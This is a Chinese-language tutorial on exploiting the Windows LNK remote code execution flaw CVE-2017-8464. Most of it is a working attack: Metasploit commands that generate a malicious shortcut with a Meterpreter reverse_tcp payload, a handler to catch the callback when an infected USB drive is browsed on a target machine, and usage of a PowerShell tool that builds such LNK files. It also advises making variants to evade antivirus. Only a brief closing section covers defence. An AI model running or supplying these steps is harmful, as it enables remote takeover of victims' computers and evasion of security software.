早在6月13日，微軟釋出補丁修復編號為CVE-2017-8464的漏洞，本地使用者或遠端攻擊者可以利用該漏洞生成特製的快捷方式，並通過可移動裝置或者遠端共享的方式導致遠端程式碼執行，追溯到以前，NSA就承認利用過相似漏洞且以“Olympic Game”為代號研發震網病毒，來阻止伊朗發展核武。

CVE-2017-8464漏洞影響版本：

Windows 7 Windows 8.1 Windows RT 8.1 Windows 10 Windows Server 2008 Windows Server 2008 R2 Windows Server 2012 Windows Server 2012 R2 Windows Server 2016

利用

1）在Metasploit-Framework中利用CVE-2017-8464

1.首先下載最新的zip包【點此下載】，下載完成後將壓縮包內modules/exploits/windows/fileformat中的cve_2017_8464_lnk_rce.rb複製到目錄/usr/share/metasploit-framework/modules/exploits/windows/fileformat下。

2.僅複製rb檔案會出錯，須再將壓縮包內data/exploits中的cve-2017-8464資料夾複製到/usr/share/metasploit-framework/data/exploits中。

3.開啟終端

msfconsole

use exploit/windows/fileformat/cve_2017_8464_lnk_rce

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST [你的IP地址]

exploit
 

之後/root/.msf4/local中就會生成我們想要的檔案了，生成這麼多和碟符有關，都留著也不佔地方。

4.繼續輸入命令

use multi/handler

set paylaod windows/meterpreter/reverse_tcp

set LHOST [你的IP地址]

run

5.將可移動磁碟插入靶機中，如果靶機開啟了自動播放，選擇瀏覽檔案時即可回彈。

演示：

*2）PowerShell

這個使用Powershell的方法並非先前網路上流傳的CVE-2017-8464復現方法。

首先下載Export-LNKPwn.ps1 <點選閱讀原文檢視該檔案>

注意：

-需要4.0或以上.NET庫版本，作者使用了一些只有PowerShell 5.0才有的建構函式（如new()），他打算將版本要求降低到.NET 3.5 和PowerShell 2.0，這樣的話模組在所有目標環境中都能被載入記憶體。 -作者想拓展函式，讓使用者可以生成原始的震網LNK exp（CVE-2010-2568），並解決繞過問題（CVE-2015-0096）. -防毒軟體會處理你的LNK，多準備來躲避檢測！

引數說明：

LNKOutPath：本地儲存LNK檔案的全路徑。

TargetCPLPath：本地/遠端目標cpl的全路徑。

Type：所使用的FolderDataBlock型別，有“SpecialFolderDataBlock”和“KnownFolderDataBlock”兩種。

使用示例：

C:PS> Export-LNKPwn -LNKOutPath C:SomeLocalPath.lnk -TargetCPLPath C:TargetCPLPath.cpl -Type SpecialFolderDataBlock

C:PS> Export-LNKPwn -LNKOutPath C:SomeLocalPath.lnk -TargetCPLPath C:TargetCPLPath.cpl -Type KnownFolderDataBlock

演示視訊：

3）Python指令碼

使用較為方便，點選閱讀原文檢視。

C）防範

1.及時打上相應補丁

2.關閉USB自動播放

3.安裝防毒軟體